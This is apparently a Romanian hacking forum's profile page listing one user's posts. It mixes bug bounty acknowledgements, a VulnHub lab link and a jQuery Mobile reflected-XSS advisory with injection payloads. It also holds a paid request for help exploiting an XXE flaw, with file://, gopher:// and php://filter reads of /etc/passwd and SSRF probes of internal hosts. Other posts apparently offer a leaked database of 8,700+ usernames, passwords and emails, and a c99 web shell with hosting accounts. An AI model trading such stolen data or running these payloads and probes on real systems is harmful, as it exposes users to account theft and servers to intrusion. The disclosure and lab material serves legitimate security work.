dr.d3v1l
-
Posts
187 -
Joined
-
Last visited
-
Days Won
2
Posts posted by dr.d3v1l
-
-
Da, doar HOF
-
-
-
Dear Dr.d3v1l
The vulnerabilities you reported has been fixed.
As a token of our appreciation we would like to offer you a t-shirt. If you would like a t-shirt please provide us with your preferred t-shirt size (S/M/L/XL/XXL) and on what address you would like to receive the t-shirt.
Thanks in advance for your reply and thanks again for your report.
Sincerely,
-
1
-
6
-
-
leak database 8700+ (user,pass,mail ecc)
-
3
-
-
PRIVATE BUGBOUNTY
AM PRIMIT 2 VPS SI 1 DOMENIU PENTRU 1 AN.
STATUS:FIXED
-
3
-
-
3 hours ago, dark-angel said:
Categorie destinata discutiilor referitoare la site-urile care au un program Bug Bounty in desfasurare prin care rasplatesc persoanele care le raporteaza vulnerabilitati
Din cate stiu eu HTC n-are bug bounty.
aici spunea ca mar hof aveai http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php
-
-
9 hours ago, TheTime said:
Cateva idei:
1. Ai dezvaluit identitatea serverului vulnerabil, te las pe tine sa-ti dai seama cum si unde.
2. Daca esti sigur ca aplicatia web ruleaza pe linux, incearca ssh:// sau ssh2:// wrappers. Poate foloseste vreo versiune de SSH client vulnerabila la RCE... cine stie.
3. Eu nu cred ruleaza pe linux, ci pe windows. Are sens de ce nu poti citi /etc/passwd?
4. Ai gasit o metoda de a exfiltra date? Cum iti dai seama daca poti citi sau nu un fisier de pe disc? SSRF-ul merge, ai incercat sa vezi ce aplicatii web sunt gazduit local / in reteaua interna? http://localhost / https://localhost / http:localhost:8080 / http(s)://10.1.1.1 (bruteforce pe ip-uri)
5. Esti autorizat sa le testezi oamenilor infrastructura, sau...?
5) da sunt autizat , doar ca au cerut ce pot exploita . De asta am pus ($$) , dar din cate am mai verificat ... nu merge
-
50 minutes ago, Nytro said:
Incearca cu file:// sa citesti de pe disk.
am incerca si cuv gopher:// file:// ftp:// php://filter/convert.base64-encode/resource=/etc/passwd , dar nimica . Am log per server de la request dar nu pot citi etc/passwd
-
7 minutes ago, aelius said:
bai labajiule care incerci sa spargi magento. Ce cacat e xxe ? Ne strici ratingul aici
xxe = XML External Entity
-
Salut Rst , cum as putea exploita complet aceasta xxe ? Am vazut un pic de topic de la owasp , da este local daca nu gresesc da se poate face si remote cred din cate am citit
*Ofer o mica suma pentru cine ma ajuta sa gasesc un exploit valid .
-
1
-
-
http://www.ipgeek.net/109.166.136.78
______________________________________
IP:109.166.136.78
Decimal:1839630414
ISP:Orange RomaniaOrganization:Orange
RomaniaTime zone:Europe/BucharestIP
Latitude:46
Longitude:25
Continent:EU
-
-
1
-
-
CTF DOWNLOAD ---> https://www.vulnhub.com/entry/sickos-11,132/
"This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them."
_____________________________________________________________________________________________________________________________________________________
Există mai multe metode pentru ao rezolva : https://www.vulnhub.com/entry/sickos-11,132/#walkthrough
_____________________________________________________________________________________________________________________________________________________
-
3
-
-
-
pai , din situ-l oficial ma trimis acolo , >.< , credeam ca era bun ahah
-
-
custsupport.westernunion.com
EXPLOIT: <script>alert(document.domain)</SCRIPT><input value=a onclick=alert(document.cookie) id=textbox>
BUGBOUNTY: out of scope
-
1
-
-
Hello,
Thank you for reporting this issue to the Microsoft Security Response Center (MSRC). Self-XSS is not considered a security vulnerability as it requires social engineering.
Please see the following for more information:
"Definition of a Security Vulnerability"
<https://msdn.microsoft.com/en-us/library/cc751383.aspx>
"Online Services Bug Bounty Terms"
<https://technet.microsoft.com/en-us/security/dn800983>
Thanks, @n3curatu
-
# Exploit Title: jQuery Mobile Docs 1.2.0 final XSS Reflected
# Software Link: jQuery Mobile: Demos and Documentation
# Exploit Author: Dr.d3v1l
# Tested On : Windows FireFox
# CVE : N/A
# Category: webapps
# Date: 05/09/2015
1. Description
Reflective XSS on forms-sample-response.php?shipping=
2. POC
URL:
404 Not Found
e.g.
code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);>
URL+CODE= http://localhost/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);>
3. Solution:
Update to version 1.3.1
jQuery Mobile Demos
-
-
eu c99 . si alte ftp . 80 account hosting ... @rodeveloper
-
# Exploit Title: jQuery Mobile Docs 1.2.0 final XSS Reflected
# Software Link: jQuery Mobile: Demos and Documentation
# Exploit Author: Dr.d3v1l
# Tested On : Windows FireFox
# CVE : N/A
# Category: webapps
# Date: 05/09/2015
1. Description
Reflective XSS on forms-sample-response.php?shipping=
2. POC
URL:
e.g.
code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);>
URL+CODE= http://localhost/fileadmin/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);>
3. Solution:
Update to version 1.3.1
.
Decompilare aplicatie Android
in Discutii incepatori
Posted
https://github.com/Konloch/bytecode-viewer